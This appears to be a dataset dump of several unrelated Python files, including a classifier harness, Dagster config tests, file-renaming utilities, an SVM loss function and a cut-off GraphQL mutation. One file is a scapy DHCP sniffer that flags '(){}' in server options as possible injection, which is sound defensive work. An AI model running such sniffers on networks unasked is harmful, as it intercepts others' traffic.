),\n 'GoodReflexAgent': ('pacmandata/good_reflex_training.pkl','pacmandata/good_reflex_validation.pkl','pacmandata/good_reflex_test.pkl' ),\n 'ContestAgent': ('pacmandata/contest_training.pkl','pacmandata/contest_validation.pkl', 'pacmandata/contest_test.pkl' )\n}\n# Main harness code\n\n\n\ndef run_classifier(args, options):\n feature_function = args['feature_function']\n classifier = args['classifier']\n print_image = args['print_image']\n \n # Load data\n num_training = options.training\n num_test = options.test\n\n if(options.data==\"pacman\"):\n agent_to_clone = args.get('agent_to_clone', None)\n training_data, validation_data, test_data = MAP_AGENT_TO_PATH_OF_SAVED_GAMES.get(agent_to_clone, (None, None, None))\n training_data = training_data or args.get('training_data', False) or MAP_AGENT_TO_PATH_OF_SAVED_GAMES['ContestAgent'][0]\n validation_data = validation_data or args.get('validation_data', False) or MAP_AGENT_TO_PATH_OF_SAVED_GAMES['ContestAgent'][1]\n test_data = test_data or MAP_AGENT_TO_PATH_OF_SAVED_GAMES['ContestAgent'][2]\n raw_training_data, training_labels = samples.load_pacman_data(training_data, num_training)\n raw_validation_data, validation_labels = samples.load_pacman_data(validation_data, num_test)\n raw_test_data, test_labels = samples.load_pacman_data(test_data, num_test)\n else:\n raw_training_data = samples.load_data_file(\"digitdata/trainingimages\", num_training,DIGIT_DATUM_WIDTH,DIGIT_DATUM_HEIGHT)\n training_labels = samples.load_labels_file(\"digitdata/traininglabels\", num_training)\n raw_validation_data = samples.load_data_file(\"digitdata/validationimages\", num_test,DIGIT_DATUM_WIDTH,DIGIT_DATUM_HEIGHT)\n validation_labels = samples.load_labels_file(\"digitdata/validationlabels\", num_test)\n raw_test_data = samples.load_data_file(\"digitdata/testimages\", num_test,DIGIT_DATUM_WIDTH,DIGIT_DATUM_HEIGHT)\n test_labels = samples.load_labels_file(\"digitdata/testlabels\", num_test)\n\n\n # Extract features\n print(\"Extracting features...\")\n training_data = list(map(feature_function, raw_training_data))\n validation_data = list(map(feature_function, raw_validation_data))\n test_data = list(map(feature_function, raw_test_data))\n\n # Conduct training and testing\n print(\"Training...\")\n classifier.train(training_data, training_labels, validation_data, validation_labels)\n print(\"Validating...\")\n guesses = classifier.classify(validation_data)\n correct = [guesses[i] == validation_labels[i] for i in range(len(validation_labels))].count(True)\n print(str(correct), (\"correct out of \" + str(len(validation_labels)) + \" (%.1f%%).\") % (100.0 * correct / len(validation_labels)))\n print(\"Testing...\")\n guesses = classifier.classify(test_data)\n correct = [guesses[i] == test_labels[i] for i in range(len(test_labels))].count(True)\n print(str(correct), (\"correct out of \" + str(len(test_labels)) + \" (%.1f%%).\") % (100.0 * correct / len(test_labels)))\n analysis(classifier, guesses, test_labels, test_data, raw_test_data, print_image)\n\n # do odds ratio computation if specified at command line\n if((options.odds) & (options.classifier == \"naive_bayes\" or (options.classifier == \"nb\")) ):\n label1, label2 = options.label1, options.label2\n features_odds = classifier.find_high_odds_features(label1,label2)\n if(options.classifier == \"naive_bayes\" or options.classifier == \"nb\"):\n string3 = \"=== Features with highest odd ratio of label %d over label %d ===\" % (label1, label2)\n else:\n string3 = \"=== Features for which weight(label %d)-weight(label %d) is biggest ===\" % (label1, label2)\n\n print(string3)\n print_image(features_odds)\n\n\n if((options.weights) & ((options.classifier in [\"perceptron_numpy\", \"logistic\"]))):\n\n for i,l in enumerate(classifier.legal_labels):\n features_weights = classifier.find_high_weight_features(l, options.num_weights)\n print((\"=== Plotting Features with high weight for label %d ===\"%l))\n ax = plt.subplot(1, len(classifier.legal_labels), 1+i)\n print_image(features_weights, ax)\n plt.show()\n\nif __name__ == '__main__':\n # Read input\n args, options = read_command( sys.argv[1:] )\n # Run classifier\n run_classifier(args, options)\n","sub_path":"CSI-480-01_Artificial Intelligence/02_ Innov. IV_ Adv. Topics - AI - Fall 2017 (2017FA)/Supervised Learning Programming Assignment/data_classifier.py","file_name":"data_classifier.py","file_ext":"py","file_size_in_byte":24852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"410409160","text":"#!/usr/bin/env python\n\"\"\"\nUsage: sudo python dhcp_mon.py\n\nThis script monitors DHCP frames and highlights potentially malicious characters\ncontained within DHCP reply options fields\n\"\"\"\n\nfrom __future__ import print_function, absolute_import, unicode_literals\nfrom scapy.all import *\nimport signal\nimport sys\n__author__ = 'themson mester'\n\n\nINTERFACE = b'eth0'\nDHCPSRVR_PACKETS = (2, 5)\nBOLD_RED = '\\033[1;91m'\nEND = '\\033[0m'\nWARNCHARS = set('(){}')\n\n\ndef handler(signum, frame):\n \"\"\"Gracefully catch sigint\"\"\"\n print(\"\\nInterrupt caught: shutting down\")\n sys.exit(signum)\n\n\ndef print_frame(frame):\n \"\"\" Parse and print DHCP Frames\n\n parse sniffed DHCP frames\n print summary of client requests\n print full options of server replies\n Highlight potentially malicious chars\n\n :param frame:\n \"\"\"\n if 'DHCP' in frame:\n options = frame['DHCP options'].options\n type_value = options[0][1]\n type_name = scapy.layers.dhcp.DHCPTypes[type_value]\n print(\"\\nFRAME: {}\".format(frame.summary()))\n print(\"TYPE: DHCP-{}\".format(type_name))\n if type_value in DHCPSRVR_PACKETS:\n print(\"OPTIONS:\")\n for option in options:\n warn = False\n if type(option) is tuple:\n for arg in option:\n if any(char in WARNCHARS for char in str(arg)):\n warn = True\n if warn is True:\n print(BOLD_RED + ' {}'.format(option) + END)\n else:\n print(' {}'.format(option))\n\n if option == 'end': # Skip padding\n return\n\n\ndef sniffer():\n \"\"\"Instantiate scapy sniffer with DHCP filters\"\"\"\n try:\n sniff(iface=INTERFACE, prn=print_frame, filter='udp and (port bootps or bootps)', store=0)\n except Exception as _e:\n print(\"ERROR - sniffer(): {}\".format(_e.args))\n\n\ndef main():\n signal.signal(signal.SIGINT, handler)\n print(\"\\nLaunching DHCP monitor.\")\n print(\"Ctrl+C to exit\")\n sniffer()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dhcp_mon.py","file_name":"dhcp_mon.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"457643059","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 20 19:53:30 2018\r\n\r\n@author: bimta\r\n\"\"\"\r\n\r\nimport pyperclip\r\nimport re\r\nfrom matplotlib_venn import venn2, venn3\r\n\r\n#Indicators that repeat:\r\n \r\nrepeaters = {\"8.4.1/12.2.1\" : [\"8.4.1\", \"12.2.1\"],\r\n \"8.4.2/12.2.2\" : [\"8.4.2\", \"12.2.2\"],\r\n \"10.3.1/16.b.1\" : [\"10.3.1\", \"16.b.1\"],\r\n \"10.6.1/16.8.1\" : [\"10.6.1\", \"16.8.1\"],\r\n \"15.7.1/15.c.1\" : [\"15.7.1\", \"15.c.1\"],\r\n \"15.a.1/15.b.1\" : [\"15.a.1\", \"15.b.1\"],\r\n \"1.5.1/11.5.1/13.1.1\" : [\"1.5.1\", \"11.5.1\", \"13.1.1\"],\r\n \"1.5.3/11.b.1/13.1.2\" : [\"1.5.3\", \"11.b.1\", \"13.1.2\"],\r\n \"1.5.4/11.b.2/13.1.3\" : [\"1.5.4\", \"11.b.2\", \"13.1.3\"]}\r\n\r\n#Single mentions of these indicators are to be exchanged for their full name\r\ndef rm_repeating(my_list):\r\n new_list = []\r\n for e in my_list:\r\n for k, v in repeaters.items():\r\n if e in v: \r\n e = str(k)\r\n new_list.append(e)\r\n else:\r\n new_list.append(e)\r\n new_list = list(set(new_list))\r\n return new_list \r\n\r\n#Pick up any list of indicators from Excel:\r\ndef excel_paste():\r\n workplans_excel_pasted = pyperclip.paste()\r\n workplans_excel_cleaned = workplans_excel_pasted.replace(\"\\r\", \"\")\r\n workplans_excel = workplans_excel_cleaned.split(\"\\n\")\r\n workplans_excel.pop(-1)\r\n return workplans_excel\r\n\r\n#make sure that there are no additional thingies in list\r\ndef list_cleaner(my_list):\r\n my_new_list = []\r\n for entry in my_list:\r\n new_entry = re.sub('[^A-Za-z0-9./]+', '', entry)\r\n my_new_list.append(new_entry)\r\n return my_new_list\r\n\r\n#check overlaps between two lists\r\ndef overlap_check2(list1, list2, no_repeating = False):\r\n if no_repeating == False:\r\n list1 = list_cleaner(list1)\r\n list2 = list_cleaner(list2)\r\n \r\n if no_repeating == True :\r\n list1 = list_cleaner(rm_repeating(list1))\r\n list2 = list_cleaner(rm_repeating(list2))\r\n \r\n set1 = set(list1)\r\n set2 = set(list2)\r\n \r\n #'\\n'.join([str(myelement) for myelement in list(set1.difference(set2))])\r\n \r\n print(\"Only in 1st set:\\n\", ', '.join(list(set1.difference(set2))))\r\n print(\"Only in 2nd set: \\n\", ', '.join(list(set2.difference(set1))))\r\n print(\"In the intersection: \\n\", ', '.join(list(set1.intersection(set2))))\r\n \r\n venn2([set1, set2])\r\n\r\n#check overlaps between three lists \r\ndef overlap_check3(list1, list2, list3):\r\n list1 = list_cleaner(list1)\r\n list2 = list_cleaner(list2)\r\n list3 = list_cleaner(list3)\r\n set1 = set(list1)\r\n set2 = set(list2)\r\n set3 = set(list3)\r\n \r\n print(\"Only in 1st set: \", ', '.join(list(set1.difference(set2|set3))))\r\n print(\"Only in 2nd set: \", ', '.join(list(set2.difference(set1|set3))))\r\n print(\"Only in 3nd set: \", ', '.join(list(set3.difference(set1|set2))))\r\n \r\n venn3([set1, set2, set3])\r\n\r\n# ok great the two that are missing are actually 8.4.1 and 10.3.1 which double with 12.2.1 and 16.b.1\r\n\r\n\r\n#cleaning the list of indicators of those with \"a\" \"b\" \"x\" versions (only needed once)\r\ndef list_cleaner_metadata(my_list):\r\n all_indicators_cleaned = []\r\n for entry in my_list:\r\n if entry[-1].isalpha():\r\n entry_cleaned = entry[:-1]\r\n all_indicators_cleaned.append(entry_cleaned)\r\n else:\r\n all_indicators_cleaned.append(entry)\r\n #changing to set to remove duplicates\r\n my_set = set(all_indicators_cleaned)\r\n all_indicators_cleaned = list(my_set)\r\n return all_indicators_cleaned\r\n \r\n \r\ndef sort_indicators(my_list):\r\n my_list.sort(key= lambda key: int(key.split('.')[2]))\r\n my_list.sort(key= lambda key: int(key.split('.')[1].replace('a','90').replace('b','91').replace('c','92')))\r\n my_list.sort(key= lambda key: int(key.split('.')[0]))\r\n return my_list\r\n\r\n\r\n\r\n\r\n","sub_path":"helper_tools.py","file_name":"helper_tools.py","file_ext":"py","file_size_in_byte":3893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"325515088","text":"import pytest\nimport yaml\nfrom dagster_aws.s3.compute_log_manager import S3ComputeLogManager\nfrom dagster_azure.blob.compute_log_manager import AzureBlobComputeLogManager\nfrom dagster_gcp.gcs.compute_log_manager import GCSComputeLogManager\nfrom kubernetes.client import models\nfrom schema.charts.dagster.subschema.compute_log_manager import (\n AzureBlobComputeLogManager as AzureBlobComputeLogManagerModel,\n)\nfrom schema.charts.dagster.subschema.compute_log_manager import (\n GCSComputeLogManager as GCSComputeLogManagerModel,\n)\nfrom schema.charts.dagster.subschema.compute_log_manager import (\n S3ComputeLogManager as S3ComputeLogManagerModel,\n)\nfrom schema.charts.dagster.subschema.daemon import Daemon, QueuedRunCoordinator\nfrom schema.charts.dagster.subschema.postgresql import PostgreSQL, Service\nfrom schema.charts.dagster.values import DagsterHelmValues\nfrom schema.utils.helm_template import HelmTemplate\n\n\ndef to_camel_case(s: str) -> str:\n components = s.split(\"_\")\n return components[0] + \"\".join(x.title() for x in components[1:])\n\n\n@pytest.fixture(name=\"template\")\ndef helm_template() -> HelmTemplate:\n return HelmTemplate(\n helm_dir_path=\"helm/dagster\",\n subchart_paths=[\"charts/dagster-user-deployments\"],\n output=\"templates/configmap-instance.yaml\",\n model=models.V1ConfigMap,\n )\n\n\n@pytest.mark.parametrize(\"storage\", [\"schedule_storage\", \"run_storage\", \"event_log_storage\"])\ndef test_storage_postgres_db_config(template: HelmTemplate, storage: str):\n postgresql_username = \"username\"\n postgresql_host = \"1.1.1.1\"\n postgresql_database = \"database\"\n postgresql_params = {\n \"connect_timeout\": 10,\n \"application_name\": \"myapp\",\n \"options\": \"-c synchronous_commit=off\",\n }\n postgresql_port = 8080\n helm_values = DagsterHelmValues.construct(\n postgresql=PostgreSQL.construct(\n postgresqlUsername=postgresql_username,\n postgresqlHost=postgresql_host,\n postgresqlDatabase=postgresql_database,\n postgresqlParams=postgresql_params,\n service=Service(port=postgresql_port),\n )\n )\n\n configmaps = template.render(helm_values)\n\n assert len(configmaps) == 1\n\n instance = yaml.full_load(configmaps[0].data[\"dagster.yaml\"])\n\n assert instance[storage]\n\n postgres_db = instance[storage][\"config\"][\"postgres_db\"]\n\n assert postgres_db[\"username\"] == postgresql_username\n assert postgres_db[\"password\"] == {\"env\": \"DAGSTER_PG_PASSWORD\"}\n assert postgres_db[\"hostname\"] == postgresql_host\n assert postgres_db[\"db_name\"] == postgresql_database\n assert postgres_db[\"port\"] == postgresql_port\n assert postgres_db[\"params\"] == postgresql_params\n\n\n@pytest.mark.parametrize(\"enabled\", [True, False])\ndef test_run_coordinator_config(template: HelmTemplate, enabled: bool):\n module_name = \"dagster.core.run_coordinator\"\n class_name = \"QueuedRunCoordinator\"\n\n helm_values = DagsterHelmValues.construct(\n dagsterDaemon=Daemon.construct(\n queuedRunCoordinator=QueuedRunCoordinator.construct(\n enabled=enabled, module=module_name, class_name=class_name\n )\n )\n )\n configmaps = template.render(helm_values)\n assert len(configmaps) == 1\n\n instance = yaml.full_load(configmaps[0].data[\"dagster.yaml\"])\n\n assert (\"run_coordinator\" in instance) == enabled\n if enabled:\n assert instance[\"run_coordinator\"][\"module\"] == module_name\n assert instance[\"run_coordinator\"][\"class\"] == class_name\n\n\n@pytest.mark.parametrize(\n argnames=[\"json_schema_model\", \"compute_log_manager_class\"],\n argvalues=[\n (AzureBlobComputeLogManagerModel, AzureBlobComputeLogManager),\n (GCSComputeLogManagerModel, GCSComputeLogManager),\n (S3ComputeLogManagerModel, S3ComputeLogManager),\n ],\n)\ndef test_compute_log_manager_has_schema(json_schema_model, compute_log_manager_class):\n json_schema_fields = json_schema_model.schema()[\"properties\"].keys()\n compute_log_manager_fields = set(\n map(to_camel_case, compute_log_manager_class.config_type().keys())\n )\n\n assert json_schema_fields == compute_log_manager_fields\n","sub_path":"helm/dagster/schema/schema_tests/test_instance.py","file_name":"test_instance.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"67985620","text":"import os\nfrom argparse import ArgumentParser\n\nimport atexit\nimport time\n\n\ndef convert(bin):\n \"\"\"\n 00010000 -> 00000001\n \"\"\"\n new_bin = ['0'] * 8\n # 10000000 -> 01000000\n new_bin[1] = bin[0]\n\n # 01000000 -> 00000100\n new_bin[5] = bin[1]\n\n # 00100000 -> 00000010\n new_bin[6] = bin[2]\n\n # 00010000 -> 00000001\n new_bin[7] = bin[3]\n\n # 00001000 -> 00001000\n new_bin[4] = bin[4]\n\n # 00000100 -> 00010000\n new_bin[3] = bin[5]\n\n # 00000010 -> 00100000\n new_bin[2] = bin[6]\n\n # 00000001 -> 10000000\n new_bin[0] = bin[7]\n\n return chr(int(''.join(new_bin), 2) + 0x2800)\n\n\ndef rotate(s, left=False):\n try:\n while True:\n print(convert(s), end='\\r')\n s = rotate_left(s) if left else rotate_right(s)\n time.sleep(0.5)\n except KeyboardInterrupt:\n pass\n\n\ndef rotate_left(s):\n return s[1:] + s[0]\n\n\ndef rotate_right(s):\n return s[-1] + s[:-1]\n\n\ndef print_dots(s, left=False):\n for i in range(8):\n print(convert(s), end='')\n s = rotate_left(s) if left else rotate_right(s)\n\n\nos.system('setterm -cursor off')\n\natexit.register(lambda: os.system('setterm -cursor on'))\nparser = ArgumentParser()\nparser.add_argument('bin', nargs='*')\nparser.add_argument('--rotate', nargs=1)\nparser.add_argument('--print', nargs=1)\nparser.add_argument('--left', action='store_true')\n\nargs = parser.parse_args()\nif args.rotate:\n rotate(args.rotate[0], args.left)\nelif args.print:\n print_dots(args.print[0], args.left)\nelse:\n for arg in args.bin:\n print(convert(arg))\n","sub_path":"scripts/loading_dots.py","file_name":"loading_dots.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"486943765","text":"import shutil\nimport tkinter as tk\nfrom pathlib import Path\nfrom tkinter.filedialog import askdirectory\n\ndef get_formatted_extension(from_extension, remediate=False):\n '''\n -- Purpose --\n Returns an extension that:\n 1. has a period in the front\n 2. Optional: is lower-case\n 3. Optional: return jpeg as jpg and tiff as tif\n\n -- Arguments --\n from_extension: type=string; file extension with or without a '.'\n\n -- Returns --\n formatted_extension: type=string; formatted extension\n '''\n # make sure there's a period at the front of the extension\n if from_extension.startswith('.'): # do nothing\n formatted_extension = from_extension\n else: # add a period\n formatted_extension = f'.{from_extension}'\n\n # make it lower-case\n if remediate:\n formatted_extension = formatted_extension.lower()\n # hard-coded alterations for jpeg and tiff\n if formatted_extension == '.jpeg':\n formatted_extension = '.jpg'\n elif formatted_extension == '.tiff':\n formatted_extension = '.tif'\n\n return formatted_extension\n\nclass ContinuingPublications_Volume:\n '''Common base class for Continuing Publications'''\n\n def __init__(self, directory):\n self.directory_path = Path(directory).resolve()\n\n\n def backup_volume(self):\n '''\n -- Purpose --\n Copy all files in directory to backup directory with name: <directory>_backup\n\n -- Arguments --\n None\n\n -- Returns --\n backup_directory_path: type=Path-like object; returns absolute path to backup directory\n '''\n backup_directory_name = f'{self.directory_path.name}_backup'\n backup_directory_path = self.directory_path.parents[0].joinpath(backup_directory_name)\n\n if backup_directory_path.exists(): # shutil.copytree requires directory to NOT exist\n # shutil.rmtree(backup_directory_path)\n print(f'Backup already exists at {backup_directory_path}')\n else:\n print(f'Backing up {self.directory_path.name} . . .')\n shutil.copytree(self.directory_path, backup_directory_path)\n\n if backup_directory_path.exists():\n print('Backup created')\n return backup_directory_path.resolve()\n\n\n def create_islandora_ingest_directory(self):\n '''\n -- Purpose --\n Create Islandora ingest directory with TIFF in nested structure\n\n -- Arguments --\n None\n\n -- Returns --\n ingest_directory_path: type=Path-like object; Path to the directory for ingest\n '''\n import datetime\n\n # set ingest stub to add to directory name\n ingest_stub = 'ForIslandoraIngest_Created'\n # get today's date in YYYY-MM-DD format and add to ingest stub\n todays_date = datetime.datetime.now().strftime('%Y-%m-%d')\n ingest_stub = f'{ingest_stub}_{todays_date}'\n\n # create ingest directory\n ingest_directory_name = f'{self.directory_path.name}_{ingest_stub}'\n ingest_directory_path = self.directory_path.parents[0].joinpath(ingest_directory_name)\n # try:\n # ingest_directory_path.mkdir()\n # except FileExistsError: # directory already exists\n # print(f'WARNING: ingest directory already exists at {ingest_directory_path}')\n\n self.directory_path.replace(ingest_directory_path)\n\n image_paths_list = [x for x in ingest_directory_path.glob('*.tif')]\n number_of_images = len(image_paths_list)\n\n print(f'Processing {number_of_images} images in {self.directory_path.name}')\n\n # for each image\n for index, image_path in enumerate(image_paths_list, start=1):\n\n # create a sub-directory with a simple index number\n image_subdirectory_path = ingest_directory_path.joinpath(str(index).zfill(6))\n try:\n image_subdirectory_path.mkdir()\n except FileExistsError:\n print(f'Sub-directory already exists at {image_subdirectory_path}')\n\n # set new image name and copy path, then copy image\n #copy_image_path = image_subdirectory_path.joinpath(image_path.name)\n #shutil.copyfile(image_path, copy_image_path)\n image_path.replace(image_subdirectory_path.joinpath(image_path.name))\n\n print(f'Ingest directory created at {ingest_directory_path}')\n print('')\n\n return ingest_directory_path\n\n\n def get_file_paths(self, with_extension):\n '''\n -- Purpose --\n Get all file Paths with_extension in self.directory_path\n\n -- Arguments --\n with_extension: type=string; extension to use for globbing\n\n -- Returns --\n file_paths_list: type:list; list of Path-like objects, 1 Path-like object\n per file_path in self.directory_path\n '''\n formatted_extension = get_formatted_extension(with_extension)\n file_paths_list = sorted(self.directory_path.glob(f'*{formatted_extension}'))\n return file_paths_list\n\n\n def rename_tiffs_to_directory_name(self, with_extension, zerofill=4):\n '''\n -- Purpose --\n Rename all files {with_extension} to {self.directory_path.name}_{str(index).zfill(zerofill)}\n *Note: will currently remediate extensions to lower-case and change tiff/jpeg to tif/jpg\n\n -- Arguments --\n with_extension: type=string; extension to rename\n zerofill: type=integer; how many digits to zeropad\n\n -- Returns --\n None\n '''\n formatted_extension = get_formatted_extension(with_extension)\n\n # extension will be lower-case and tif/jpg instead of tiff/jpeg\n remediated_extension = get_formatted_extension(with_extension, remediate=True)\n\n # get total number of files and the paths for files to rename\n file_paths_list = self.get_file_paths(formatted_extension)\n number_of_files = len(file_paths_list)\n\n print(f'{number_of_files} with {formatted_extension}')\n\n if number_of_files == 0:\n pass\n\n else: # rename files\n backup_directory_path = self.backup_volume()\n\n print(f'Renaming {number_of_files} \"{formatted_extension}\"s in {self.directory_path.name} . . .')\n\n count = 0\n try:\n for index, file_path in enumerate(file_paths_list, start=1):\n # rename TIFF files from Adobe Acrobat for Islandora ingest, i.e. FILENAME.extension\n new_file_name = f'{self.directory_path.name.upper()}_{str(index).zfill(zerofill)}{remediated_extension}'\n new_file_path = file_path.parents[0].joinpath(new_file_name)\n file_path.replace(new_file_path)\n count = index\n except IndexError:\n pass\n\n print(f' Renamed {count} \"{formatted_extension}\"s')\n print('')\n\n\n def rename_PDFs_for_ingest(self):\n\n pdf_paths_list = self.get_file_paths('.pdf')\n\n number_of_pdfs = len(pdf_paths_list)\n if number_of_pdfs == 0:\n print(f'{number_of_pdfs} PDFs to process')\n else: # process PDFs\n for pdf_path in pdf_paths_list:\n # expect PDF stems ending in original or processed\n if pdf_path.stem.lower().endswith('original'):\n new_pdf_path = pdf_path.parents[0].joinpath('ORIGINAL.pdf')\n elif pdf_path.stem.lower().endswith('processed'):\n new_pdf_path = pdf_path.parents[0].joinpath('PROCESSED.pdf')\n else: # don't rename\n print(f'{pdf_path} is not original or processed, manually remediate')\n print('')\n continue\n # rename PDF\n print(f'Renaming {pdf_path.name} to {new_pdf_path}')\n print('')\n pdf_path.replace(new_pdf_path)\n\nif __name__ == \"__main__\":\n\n # get file directory to process\n # https://stackoverflow.com/a/14119223\n root = tk.Tk()\n root.withdraw() # NO tk root window pop-up\n directory_path = Path(askdirectory())\n root.destroy() # close tk window\n\n print('')\n print(f'Directory: {directory_path}')\n print('')\n\n # create Volume\n volume = ContinuingPublications_Volume(directory_path)\n\n # rename Adobe Acrobat .tiff files to directory and .tif extension\n volume.rename_tiffs_to_directory_name('.tiff')\n volume.rename_tiffs_to_directory_name('.tif')\n\n # rename PDFs for ingest\n volume.rename_PDFs_for_ingest()\n\n # create Islanodra book ingest directory\n ingest_directory_path = volume.create_islandora_ingest_directory()\n\n # create book directory path as needed for Islandora\n book_directory_path = volume.directory_path.parents[0].joinpath('book')\n book_directory_path.mkdir(exist_ok=True)\n\n # move ingest directory into book directory\n final_path = book_directory_path.joinpath(ingest_directory_path.name)\n ingest_directory_path.replace(final_path)\n\n number_of_books = len([x for x in book_directory_path.iterdir() if x.is_dir()])\n print(f'{number_of_books} books in {book_directory_path} for ingest')\n print('')\n\n # keep command window open after running PyInstaller\n print('Press Enter key to close window')\n input()\n","sub_path":"utk_ContinuingPublications_CreateBookIngest.py","file_name":"utk_ContinuingPublications_CreateBookIngest.py","file_ext":"py","file_size_in_byte":9341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"408677587","text":"import numpy as np\nfrom random import shuffle\n\ndef svm_loss_naive(W, X, y, reg):\n \"\"\"\n Structured SVM loss function, naive implementation (with loops).\n\n Inputs have dimension D, there are C classes, and we operate on minibatches\n of N examples.\n\n Inputs:\n - W: A numpy array of shape (D, C) containing weights.\n - X: A numpy array of shape (N, D) containing a minibatch of data.\n - y: A numpy array of shape (N,) containing training labels; y[i] = c means\n that X[i] has label c, where 0 <= c < C.\n - reg: (float) regularization strength\n\n Returns a tuple of:\n - loss as single float\n - gradient with respect to weights W; an array of same shape as W\n \"\"\"\n dW = np.zeros(W.shape)\n num_classes = W.shape[1]\n num_train = X.shape[0]\n loss = 0.0\n delta = 1\n for i_train in range(num_train):\n scores = X[i_train].dot(W)\n correct_class_score = scores[y[i_train]]\n for j_weight in range(num_classes):\n if j_weight == y[i_train]:\n continue\n margin = scores[j_weight] - correct_class_score + delta # note delta = 1\n if margin > 0:\n loss += margin\n #dW[:, j_weight] += np.clip(X[i_train], -margin, margin)\n #dW[:, y[i_train]] -= np.clip(X[i_train], -margin, margin)\n dW[:, j_weight] += X[i_train]\n dW[:, y[i_train]] -= X[i_train]\n dW /= num_train\n loss += 0.5 * reg * np.sum(W * W)\n loss /= num_train\n return loss, dW\n\n\ndef svm_loss_vectorized(W, X, y, reg):\n \"\"\"\n Structured SVM loss function, vectorized implementation.\n\n Inputs and outputs are the same as svm_loss_naive.\n \"\"\"\n loss = 0.0\n dW = np.zeros(W.shape) # initialize the gradient as zero\n\n preds = X.dot(W)\n y_true_score = preds[np.arange(preds.shape[0]), y].reshape(preds.shape[0], 1)\n errors = preds - y_true_score + 1\n loss += (errors[errors > 0].sum() - y_true_score.shape[0])/ preds.shape[0]\n loss += 0.5 * reg * np.sum(W * W)\n\n upper_margin_mask = (preds > np.reshape(preds[np.arange(preds.shape[0]), y] - 1, (preds.shape[0], 1)))\n y_true_mask = preds == np.reshape(preds[np.arange(preds.shape[0]), y], (preds.shape[0], 1))\n has_upper_margin = upper_margin_mask.sum(1) > 1\n y_need_change = (-1) * (upper_margin_mask.sum(1).reshape(-1,1)) * (y_true_mask & has_upper_margin.reshape(-1, 1))\n change = upper_margin_mask + y_need_change\n\n for i_col in range(dW.shape[1]):\n dW[:, i_col] = (X * change[:, i_col].reshape(-1, 1)).sum(0)\n dW /= y.shape[0]\n return loss, dW\n","sub_path":"assigment1/cs231n/classifiers/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"359360805","text":"#Printing to the Screen\nprint(\"Python is really a great language,\", \"isn't it?\")\n\n#Reading Keyboard Input\nstr = input(\"Enter your input: \")\nprint(\"Received input is :\", str)\n\n# Reading and Writing Files\n# we've written in the file\nfile = open(\"./files/forwrite.txt\", \"w\")\nfile.write(\"Hello world and hello universe too\")\nfile.close()\n\n# now we've read this file\nfile = open(\"./files/forwrite.txt\", \"r\")\nprint(file.read())\nfile.close()","sub_path":"files_io.py","file_name":"files_io.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"595428893","text":"from graphene import Mutation as ObjectMutation, ID, Boolean, List, String, ObjectType, Int\nfrom .import PRODUCT_LIKE_COLLECTION, PRODUCT_COLLECTION, PRODUCT_REPORT_COLLECTION, PRODUCT_BOOKMARK_COLLECTION\nfrom ..utils.utils import increase_or_decrease_a_document_field, remove_documents_from_a_collection\nimport logging\n\n\nclass ToggleLikeProduct(ObjectMutation):\n ok = Boolean(required=True)\n errorList = List(\n String,\n required=False,\n )\n\n class Arguments:\n toProductId = ID(required=True)\n\n async def mutate(self, info, **kwargs):\n \"\"\"\n add 1 like to product and remove if exist\n \"\"\"\n ok: bool = False\n errorList: list = list()\n user = info.context[\"request\"].user\n existingLikeRelationDocuments: list = list()\n\n # check authenticated or not:\n if user.is_authenticated:\n toProductId: str = kwargs.get(\"toProductId\", \"\").strip()\n myUserId: str = getattr(user, \"id\", \"\")\n if toProductId != \"\":\n if myUserId != \"\":\n # loooking for like relations ship between this user and this product:\n try:\n fetchResultGenerator = PRODUCT_LIKE_COLLECTION.where(\n u\"from_user_id\",\n u\"==\",\n u\"{}\".format(myUserId)\n ).where(\n u\"to_product_id\",\n u\"==\",\n u\"{}\".format(toProductId)\n ).stream()\n except Exception as e:\n logging.error(f\"Error getting user-product like: {e}.\")\n else:\n for like in fetchResultGenerator:\n existingLikeRelationDocuments.append(like)\n if len(existingLikeRelationDocuments):\n ok = True\n else:\n try:\n PRODUCT_LIKE_COLLECTION.add({\n u\"from_user_id\": myUserId,\n u\"to_product_id\": toProductId\n })\n except Exception as e:\n logging.error(f\"Error like product: {e}.\")\n else:\n ok = True\n else:\n logging.error(\"Couldn't get user id.\")\n else:\n errorList.append(\"Product id is required.\")\n else:\n errorList.append(\"You have to logged in to like this product.\")\n\n if ok and not len(errorList):\n background = info.context[\"background\"]\n amount = len(existingLikeRelationDocuments)\n if amount:\n background.add_task(\n remove_documents_from_a_collection,\n existingLikeRelationDocuments\n )\n # IMPORTANT: you have to increase || decrease \"number_of_likes\" from \".models.ProductLikeType\"\n background.add_task(\n increase_or_decrease_a_document_field,\n PRODUCT_COLLECTION,\n toProductId,\n \"number_of_likes\",\n 1 if amount == 0 else -amount\n )\n\n return ToggleLikeProduct(\n ok=ok,\n errorList=errorList\n )\n\n\nclass ReportProduct(ObjectMutation):\n ok = Boolean(required=True)\n errors = List(\n String,\n required=False\n )\n\n class Arguments:\n toProductId = ID(required=True)\n product_problems = List(Int, required=True)\n description = String(required=True)\n confirmation = Boolean(required=False)\n\n async def mutate(self, info, **kwargs):\n \"\"\"\n send a report if this user has not done yet\n \"product_problems\" can contains at most 3 problems\n \"\"\"\n from google.cloud.firestore_v1.document import DocumentSnapshot\n ok, errors = False, list()\n user = info.context[\"request\"].user\n\n if user.is_authenticated:\n # get this user id, refer to \"middleware.auth.py\"\n myUserId = getattr(user, \"id\", \"\")\n toProductId, product_problems, description, confirmation = [\n kwargs.get(key, \"\") for key in [\"toProductId\", \"product_problems\", \"description\", \"confirmation\"]\n 